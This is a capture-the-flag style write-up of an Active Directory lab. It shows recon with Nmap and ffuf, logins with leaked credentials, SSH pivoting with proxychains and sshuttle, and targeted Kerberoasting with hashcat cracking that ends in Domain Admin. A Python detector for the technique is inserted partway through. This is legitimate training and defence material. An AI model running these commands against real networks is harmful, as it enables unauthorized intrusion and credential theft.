
In the Stacy’s Office Active Directory Lab, participants take on the role of red teamers, tasked with exploiting a simulated corporate environment. This lab involves an Active Directory setup where users must infiltrate the network, escalate privileges, and gain unauthorized access to sensitive information.
Enumeration
We can start off with a basic Nmap scan, which shows that ports 22 and 80 are open:
nmap 65.109.81.145 -sV -sC -Pn -p22,80
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-18 23:38 EDT
Nmap scan report for static.145.81.109.65.clients.your-server.de (65.109.81.145)
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0b2dc055622709ce0aafdf60a19dcf3 (ECDSA)
|_ 256 199bfcdff0d91d273925b2e3cf7c9a23 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.58 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds
We can take a look around the website and notice that there is only the default Ubuntu Apache2 page, so we can use ffuf to search for files that may not be publicly linked. If you need more information on ffuf, check out our ffuf cheat sheet.
ffuf -u http://65.109.81.145/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -mc 200
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://65.109.81.145/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
README.md [Status: 200, Size: 172, Words: 19, Lines: 12, Duration: 116ms]
Looks like we found a README file that is pretty interesting: its contents are credentials.
# install jira on this server and connect to ad machine
# ad details
[email protected]
jira:Summer2024!
# local machine
jira:jira
# sysadmin machine
jerrod:Summer2024!!
Initial Foothold
Using the credentials provided in the README file, we can assume that "local machine" is the web server we already have access to. Let's try those credentials now.
Credentials:
- jira:jira
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-38-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Mon Aug 19 03:42:48 AM UTC 2024
System load: 0.0 Processes: 151
Usage of /: 10.6% of 47.93GB Users logged in: 1
Memory usage: 13% IPv4 address for ens19: 65.109.81.145
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
43 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Aug 19 03:34:01 2024 from 174.95.43.83
jira@jira-1:~$
Looks like we have our initial foothold! Well, that was easy!
Enumerating our foothold
Now that we have access to the web server, let's take a look around and see what information we can extract. I personally like to take a manual approach before automation, so that I can be sure I did not miss anything. I like to take the following steps:
- Look for files that are not standard on an Ubuntu system (since we know it is Ubuntu)
- Check the hosts and passwd files, and look for any SUID binaries
- Run sudo -l to see what our user is allowed to run with sudo
- Check for interesting software installed on the machine
- Check the network configuration and see whether other hosts are reachable
- Run LinPEAS and other toolkits that are relevant to the system
Here is what we can find:
The /etc/hosts file lists hosts that are interesting, and we may already have credentials for them from the README. So far we have only used the "local machine" entry; since we see "stacy.local" and "ws-1", we can assume that the "# ad details" credentials belong to "stacy.local" and the "# sysadmin machine" credentials belong to "ws-1". We can try that a bit later; let's dig deeper first.
jira@jira-1:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 jira
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# ad machines
ws-1 10.20.0.10
stacy.local 10.20.0.9
jira@jira-1:~$
Using the "realm" command we can see information about stacy.local, since this Linux machine is joined to the domain; you can find more information about this on the Red Hat Linux Blog.
jira@jira-1:~$ realm discover stacy.local
stacy.local
type: kerberos
realm-name: STACY.LOCAL
domain-name: stacy.local
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %U@stacy.local
login-policy: allow-realm-logins
jira@jira-1:~$
(Optionally) we ran a ping sweep, which would have yielded the same results as the /etc/hosts file but with less context about what each host is used for.
for ip in {1..254}; do ping -c 1 10.20.0.$ip | grep "64 bytes" & done | less
64 bytes from 10.20.0.1: icmp_seq=1 ttl=64 time=0.265 ms
64 bytes from 10.20.0.7: icmp_seq=1 ttl=128 time=0.195 ms
64 bytes from 10.20.0.14: icmp_seq=1 ttl=64 time=0.010 ms
64 bytes from 10.20.0.9: icmp_seq=1 ttl=128 time=0.231 ms
64 bytes from 10.20.0.10: icmp_seq=1 ttl=128 time=0.275 ms
Setting up a SOCKS4 proxy for pivoting
We can use SSH to set up a SOCKS4 proxy by dynamically forwarding traffic to local port 1080, then use proxychains to enumerate the other hosts from our local Kali system.
ssh -D 1080 jira@65.109.81.145
The authenticity of host '65.109.81.145 (65.109.81.145)' can't be established.
ED25519 key fingerprint is SHA256:5dTODnJVOaI6dhHCJo0Nf5x1HKbs2FE4XFruQlr71NY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '65.109.81.145' (ED25519) to the list of known hosts.
jira@65.109.81.145's password:
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-38-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sun Oct 13 05:33:34 PM UTC 2024
System load: 0.0 Processes: 143
Usage of /: 10.6% of 47.93GB Users logged in: 1
Memory usage: 13% IPv4 address for ens19: 65.109.81.145
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
43 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun Jul 14 17:34:16 2024 from 67.222.245.98
jira@jira-1:~$
Testing our proxy chains configuration:
proxychains nmap 10.20.0.14 -p80,22
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 13:35 EDT
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.20.0.14:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.20.0.14:22 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.20.0.14:80 ... OK
Nmap scan report for 10.20.0.14
Host is up (0.15s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.64 seconds
Enumerating other hosts
Now that we know our SOCKS proxy is working as designed and we have successfully pivoted into the 10.20.0.0/24 range, we can start enumerating the hosts we found in the /etc/hosts file.
The proxychains Nmap scan can get very long and verbose, so it is recommended to write the output to a results file and grep for open ports, like so:
Results of 10.20.0.10:
cat results.txt | grep open
Discovered open port 445/tcp on 10.20.0.10
Discovered open port 135/tcp on 10.20.0.10
Discovered open port 3389/tcp on 10.20.0.10
Discovered open port 139/tcp on 10.20.0.10
Results of 10.20.0.9:
cat results.txt | grep open
Discovered open port 53/tcp on 10.20.0.9
Discovered open port 135/tcp on 10.20.0.9
Discovered open port 445/tcp on 10.20.0.9
Discovered open port 3389/tcp on 10.20.0.9
Discovered open port 139/tcp on 10.20.0.9
Discovered open port 3269/tcp on 10.20.0.9
Foothold #2
Now that we know which ports are open: it is a pain to use proxychains to interact with hosts in the post-exploitation phase, so we will use sshuttle to route the 10.20.0.0/24 range through the SSH connection and reach it directly from our local machine:
sshuttle -r jira@65.109.81.145 10.20.0.0/24
jira@65.109.81.145's password:
c : Connected to server.
Because we know that the 10.20.0.10 host has the RDP port open, let's try the credentials from the README file we found earlier.
The following credentials work:
- jerrod:Summer2024!!
We now have access to the 10.20.0.10 host:

Enumerating Foothold 2:
At first glance there is nothing of interest, so I decided to leave this host alone and move on to the 10.20.0.9 host, which I suspected is the Active Directory domain controller based on the open ports.

Owning the Domain Controller
The most common Active Directory attack out there is Kerberoasting; because it is so easy to misconfigure on the domain controller, it is often one of the first things an attacker looks at in an AD environment. We will use targetedKerberoast.py with Jerrod's credentials to authenticate to stacy.local (10.20.0.9) and dump some juicy hashes. Note the "SPN added" and "SPN removed" lines in the output: the script temporarily writes an SPN onto every account the authenticated user has write access to, requests a service ticket, and removes the SPN again, which is why accounts with no real SPN show up in the results.
python3 targetedKerberoast.py -v -d "stacy.local" -u "jerrod" -p 'Summer2024!!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Administrator)
[+] Printing hash for (Administrator)
$krb5tgs$23$*Administrator$STACY.LOCAL$stacy.local/Administrator*$b716aebd43c9a80efcdf3e1b4d597afc$...
[VERBOSE] SPN removed successfully for (Administrator)
[VERBOSE] SPN added successfully for (jerrod)
[+] Printing hash for (jerrod)
$krb5tgs$23$*jerrod$STACY.LOCAL$stacy.local/jerrod*$ede016cbcc87da4e5e27a5b86ae60dfb$...
[VERBOSE] SPN removed successfully for (jerrod)
[VERBOSE] SPN added successfully for (jira)
[+] Printing hash for (jira)
$krb5tgs$23$*jira$STACY.LOCAL$stacy.local/jira*$aa11c9f1e91eafb56a185da993eb1056$...
[VERBOSE] SPN removed successfully for (jira)
[VERBOSE] SPN added successfully for (jira-1)
[+] Printing hash for (jira-1)
$krb5tgs$23$*jira-1$STACY.LOCAL$stacy.local/jira-1*$d268733da79c6d7551a9af10862c7d21$...
[VERBOSE] SPN removed successfully for (jira-1)
[VERBOSE] SPN added successfully for (stacy)
[+] Printing hash for (stacy)
$krb5tgs$23$*stacy$STACY.LOCAL$stacy.local/stacy*$deb10b1e5b38156d9bfb49b8635d3c1e$...
[VERBOSE] SPN removed successfully for (stacy)
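As an added defensive example (not part of the original write-up or of targetedKerberoast.py), the following Python correlates the pattern visible in the output above, an SPN written onto an account, an RC4 service ticket requested for it, then the SPN removed, using Windows Security events 5136 (directory object modified) and 4769 (Kerberos service ticket requested). The event records are constructed, and the check assumes directory service change auditing is enabled on the user objects so that 5136 is actually logged.

```python
from collections import defaultdict

# Constructed sample events (not real logs): (time_in_seconds, event_id, fields).
# Field names follow the Windows 5136 / 4769 event schemas; the values are made up.
SAMPLE_EVENTS = [
    (100, 5136, {"SubjectUserName": "jerrod", "AttributeLDAPDisplayName": "servicePrincipalName",
                 "ObjectDN": "CN=Administrator,CN=Users,DC=stacy,DC=local", "OperationType": "%%14674"}),
    (101, 4769, {"TargetUserName": "jerrod@STACY.LOCAL", "ServiceName": "Administrator",
                 "TicketEncryptionType": "0x17"}),
    (102, 5136, {"SubjectUserName": "jerrod", "AttributeLDAPDisplayName": "servicePrincipalName",
                 "ObjectDN": "CN=Administrator,CN=Users,DC=stacy,DC=local", "OperationType": "%%14675"}),
    # Benign: a ticket for a service account that legitimately has an SPN, requested with AES.
    (200, 4769, {"TargetUserName": "alice@STACY.LOCAL", "ServiceName": "svc_sql",
                 "TicketEncryptionType": "0x12"}),
]

SPN_ADDED, SPN_REMOVED = "%%14674", "%%14675"   # 5136 OperationType: value added / value deleted
RC4_HMAC = "0x17"                               # 4769 TicketEncryptionType for RC4 (offline-crackable)

def account_from_dn(dn):
    """'CN=Administrator,CN=Users,DC=stacy,DC=local' -> 'administrator'."""
    return dn.split(",")[0].split("=", 1)[1].lower()

def detect_targeted_kerberoast(events, window=300):
    """Sorted (actor, target) pairs: actor added an SPN to target, got an RC4 ticket, removed the SPN within window s."""
    spn_writes = defaultdict(list)    # target account -> [(time, actor, operation)]
    rc4_requests = defaultdict(list)  # service account -> [(time, requester)]
    for t, event_id, f in events:
        if event_id == 5136 and f.get("AttributeLDAPDisplayName") == "servicePrincipalName":
            spn_writes[account_from_dn(f["ObjectDN"])].append(
                (t, f["SubjectUserName"].lower(), f["OperationType"]))
        elif event_id == 4769 and f.get("TicketEncryptionType") == RC4_HMAC:
            rc4_requests[f["ServiceName"].lower()].append(
                (t, f["TargetUserName"].split("@")[0].lower()))
    hits = set()
    for target, writes in spn_writes.items():
        for t_add, actor, op in writes:
            if op != SPN_ADDED:
                continue
            lo, hi = t_add, t_add + window
            removed = any(op2 == SPN_REMOVED and a2 == actor and lo <= t2 <= hi for t2, a2, op2 in writes)
            requested = any(r == actor and lo <= t2 <= hi for t2, r in rc4_requests[target])
            if removed and requested:
                hits.add((actor, target))
    return sorted(hits)

if __name__ == "__main__":
    for actor, target in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print(f"possible targeted Kerberoast: {actor} wrote an SPN on {target}, requested an RC4 ticket, removed it")
```

A hit on a privileged account such as Administrator is doubly interesting, because it also shows the actor holds write access to that object, which is the misconfiguration that makes this technique work.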
Cracking the hashes
We can crack the hashes with hashcat and a password file.
hashcat -m 13100 hash-krb.txt pass.txt -O --force --potfile-disable
We have cracked two of the hashes: Administrator and stacy.
$krb5tgs$23$*Administrator$STACY.LOCAL$stacy.local/Administrator*$b716aebd43c9a80efcdf3e1b4d597afc$...:Summer2024!
$krb5tgs$23$*stacy$STACY.LOCAL$stacy.local/stacy*$deb10b1e5b38156d9bfb49b8635d3c1e$...:amazing.07
Pwned Active Directory Environment
By cracking these hashes, we now have Domain Admin access and Stacy's account on 10.20.0.9.


This lab machine is now completed! If you liked this article, please consider leaving a comment.